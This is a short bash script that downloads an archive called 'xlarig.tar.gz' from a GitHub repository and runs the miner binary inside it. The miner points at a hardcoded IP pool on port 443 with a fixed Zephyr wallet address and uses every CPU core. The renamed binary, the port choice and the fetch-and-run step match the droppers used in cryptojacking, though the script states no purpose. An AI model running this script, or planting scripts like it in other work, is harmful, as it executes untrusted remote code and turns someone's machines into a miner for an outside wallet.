#!/bin/bash
wget https://github.com/bengetsia/soft/raw/main/xlarig.tar.gz && tar -xvf xlarig.tar.gz
./xlarig --donate-level 1 -o 192.53.115.37:443 -u ZEPHs8rEtqZaJ25FqjXvMbiFvPjuVd9VKP8whAB56jDbcBSxQuPJEhyDC7SQCGKAzcC2kT7VybgQGfVKo73aB518g7XrdF7yc1C -p mahr -a rx/0 -t $(nproc --all)
